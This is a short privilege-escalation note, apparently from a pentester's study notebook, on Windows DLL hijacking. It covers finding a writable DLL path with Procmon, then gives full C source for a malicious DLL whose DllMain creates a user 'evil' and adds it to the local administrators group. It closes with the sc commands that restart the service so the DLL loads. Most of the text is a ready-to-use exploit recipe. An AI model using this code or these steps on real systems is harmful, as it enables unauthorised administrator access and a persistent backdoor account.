Run Procmon as administrator in rdp session
Add filters
cmd.exe
Now procmon will show more output
Check for any .dll file path which is writable
Now create same .dll file using windows_dll.c script in kali
<aside> 👨💻 // For x64 compile with: x86_64-w64-mingw32-gcc windows_dll.c -shared -o output.dll // For x86 compile with: i686-w64-mingw32-gcc windows_dll.c -shared -o output.dll
#include <windows.h>
BOOL WINAPI DllMain (HANDLE hDll, DWORD dwReason, LPVOID lpReserved) { if (dwReason == DLL_PROCESS_ATTACH) { //or we can add a new user to administrator group system("cmd.exe /k net user evil pass1234 /add"); system("cmd.exe /k net localgroup administrators evil /add"); ExitProcess(0); } return TRUE; }
</aside>
transfer .dll to wrtable location found on Procmon
sc stop dllsvc & sc start dllsvc
now evil user has been added in administrator group